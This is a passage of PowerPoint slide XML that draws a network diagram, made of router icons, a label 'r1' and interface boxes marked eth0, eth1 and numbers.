              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9222" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E5EFE9D-AC3E-D6CD-348E-F6DBA60AC1E5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3028" y="2348"/>
                  <a:ext cx="393" cy="132"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 28 h 132"/>
                    <a:gd name="T2" fmla="*/ 305 w 393"/>
                    <a:gd name="T3" fmla="*/ 0 h 132"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 83 h 132"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 55 h 132"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 132 h 132"/>
                    <a:gd name="T10" fmla="*/ 305 w 393"/>
                    <a:gd name="T11" fmla="*/ 132 h 132"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 104 h 132"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 28 h 13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93" h="132">
                      <a:moveTo>
                        <a:pt x="393" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="305" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9236" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AEF5AE6-9EF6-AEAE-4B32-F91C29D8C5B8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3050" y="2194"/>
                  <a:ext cx="392" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 392"/>
                    <a:gd name="T1" fmla="*/ 28 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 392"/>
                    <a:gd name="T5" fmla="*/ 77 h 125"/>
                    <a:gd name="T6" fmla="*/ 392 w 392"/>
                    <a:gd name="T7" fmla="*/ 56 h 125"/>
                    <a:gd name="T8" fmla="*/ 341 w 392"/>
                    <a:gd name="T9" fmla="*/ 125 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 392"/>
                    <a:gd name="T11" fmla="*/ 125 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 392"/>
                    <a:gd name="T13" fmla="*/ 104 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 392"/>
                    <a:gd name="T15" fmla="*/ 28 h 12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92" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9238" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1527EF18-6342-CB67-D03A-0FA587C82AD6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3442" y="2361"/>
                  <a:ext cx="393" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 124"/>
                    <a:gd name="T2" fmla="*/ 306 w 393"/>
                    <a:gd name="T3" fmla="*/ 124 h 124"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 41 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 69 h 124"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 124"/>
                    <a:gd name="T10" fmla="*/ 306 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 124"/>
                    <a:gd name="T12" fmla="*/ 197 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 124"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 12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93" h="124">
                      <a:moveTo>
                        <a:pt x="393" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="306" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9217" name="WordArt 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C28461C-671C-A273-C57A-9AA1E5FCB45C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2885" y="428"/>
              <a:ext cx="346" cy="103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1400" kern="10" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>r1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9251" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE970CB2-C938-E9C6-061F-01CBCE44D119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5002404" y="2547001"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9252" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86A4816E-6D63-9748-C99F-20C3B4B74485}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9253" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3ACF1EB-9334-12C7-70E0-FF4CEA8942F5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9254" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B04A3CFF-6138-93D4-CC65-1DF51E549BEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4989256" y="3258486"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9255" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{324DC53F-807D-7E5A-C384-7B631922E025}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9256" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18BF739F-9F90-3CD3-3780-952483836891}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9257" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CC082DC-74DF-3B4B-52FE-EA3CDA251989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5008167" y="4928067"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9258" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7DCFE79-584D-103A-6290-96D21B025853}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9259" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0851CCDD-7F24-08B8-8870-BCBDD61E87B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9260" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DED2EF20-3E5A-6337-AC65-868E82336DBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5013037" y="4230593"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9261" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1905246F-C41F-9ECE-813E-CA4AC2CCC37F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9262" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D2EA39-FB03-0291-9560-20A0A2FD6AB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9263" name="Group 227">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5CDE52E-EA65-1F47-DAFD-565102A82E6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4962850" y="4602893"/>
            <a:ext cx="441381" cy="243680"/>
            <a:chOff x="2859" y="339"/>
            <a:chExt cx="384" cy="212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9264" name="Group 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40AFF6C1-7E7B-BFFA-B394-36A53884E3E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2859" y="339"/>
              <a:ext cx="384" cy="212"/>
              <a:chOff x="5178" y="2567"/>
              <a:chExt cx="960" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9266" name="AutoShape 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{690F713E-8F5F-80B4-41F1-3A7BD76D1EA5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5178" y="2567"/>
                <a:ext cx="960" cy="528"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="0066CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="819F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3025" tIns="36512" rIns="73025" bIns="36512"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it-IT" altLang="it-IT"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9267" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F8FFF6E-76D6-109E-1D11-EA16FAA8345C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372" y="2597"/>
                <a:ext cx="595" cy="204"/>
                <a:chOff x="3028" y="2194"/>
                <a:chExt cx="823" cy="291"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9268" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE7334CD-3168-1F46-FD28-E9D8E132A6C7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3458" y="2201"/>
                  <a:ext cx="393" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 393"/>
                    <a:gd name="T3" fmla="*/ 125 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 393"/>
                    <a:gd name="T5" fmla="*/ 42 h 125"/>
                    <a:gd name="T6" fmla="*/ 393 w 393"/>
                    <a:gd name="T7" fmla="*/ 70 h 125"/>
                    <a:gd name="T8" fmla="*/ 342 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 393"/>
